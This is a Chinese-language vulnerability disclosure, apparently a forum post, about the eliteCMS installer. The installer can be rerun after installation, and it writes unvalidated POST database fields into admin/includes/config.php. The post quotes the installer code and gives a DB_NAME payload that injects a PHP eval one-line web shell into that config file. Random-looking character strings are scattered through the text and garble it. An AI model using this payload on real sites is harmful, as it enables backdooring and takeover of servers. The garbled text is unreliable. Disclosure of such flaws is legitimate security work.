eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装! u. @6 @$ N5 A0 Z: J( k
, [$ j+ U. Y2 ?' O
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php8 t. v# o# V) A% Z8 D
我们来看代码:& f7 U" @! p9 }2 D
% m/ A5 T1 j- S0 x5 ]...
$ t# A7 f5 t0 ^6 N [% y& ielseif ($_GET['step'] == "4") {
4 F8 H0 e' b+ {; V3 E. o $file = "../admin/includes/config.php";
+ u: x4 V2 C ?. S9 T/ [7 n $write = "<?php\n";9 u2 U# e, ]% x- m( b( K
$write .= "/**\n";
+ e4 H8 G" m! t8 Z' L $write .= "*\n";
- G7 P8 r: G9 _$ ~1 v $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";- H, D h# y" Y( }
...略...
" z- S6 Z( y ], a; l" c $write .= "*\n";8 G4 [$ A0 D O9 J/ K
$write .= "*/\n";9 e1 Y. o- E# Q
$write .= "\n";1 I* F: g, _& o4 X
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";- @* ~' D4 W M" j. ] ^
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";& ?1 e L( W) b/ U
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
6 n& R& q* G } V8 R $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
7 X# o/ Y2 {! E' `, F9 {/ Q0 w $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
1 s( e/ D Y( z6 r- M6 M9 g+ W( Q3 Z $write .= "if (!\$connection) {\n";
7 z: [9 ^/ o3 K* S, @# [9 F $write .= " die(\"Database connection failed\" .mysql_error());\n";
; V! k+ ^6 h" y5 ~3 i1 v+ t# C $write .= " \n";
% A8 f0 I' X6 \ f8 b# E. i" a $write .= "} \n";
: Z' N- U* p5 B( O' u! L$ ` $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
: p$ ^1 W* ^$ _+ I% E" @ $write .= "if (!\$db_select) {\n";3 f! Y, e0 u: |: W1 R9 u
$write .= " die(\"Database select failed\" .mysql_error());\n";
% V5 p# l0 w8 {' G0 F" N* G $write .= " \n";
1 C% o! F; C2 s& l; y5 x/ U& t $write .= "} \n";4 e5 q% O% B* @
$write .= "?>\n";/ ^- R" U( x8 j& a8 a
7 I/ v9 p% N: B& y5 }
$writer = fopen($file, 'w');
1 w$ K: n( U5 J# D) I! p...
0 h' J2 e o q$ L% b" i! u
! }! I* O3 H, }0 r在看代码:. x+ Y0 j2 h& Z; e! X' B
: T+ U# y j: l/ q, M2 I
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
! @( {$ \$ p; U0 ~- v$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$ N4 @/ [( J% T" [$_SESSION['DB_USER'] = $_POST['DB_USER'];% h* U# K6 G* h
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];* W$ r9 G7 v- p3 E) I s; w: O
; O5 w9 o5 Z, }& F取值未作任何验证 r9 b" h6 G- z9 E" r, S
如果将数据库名POST数据:6 c# `+ d% K) U3 m m& L% o e
! T2 f8 x) C/ K- h: N5 M* `
"?><?php eval($_POST[c]);?><?php6 N; R3 k0 F+ J" l
" ~" `9 G$ [3 z4 a1 @7 O
将导致一句话后门写入/admin/includes/config.php
2 k: @4 T4 Y" b# j4 O: ? |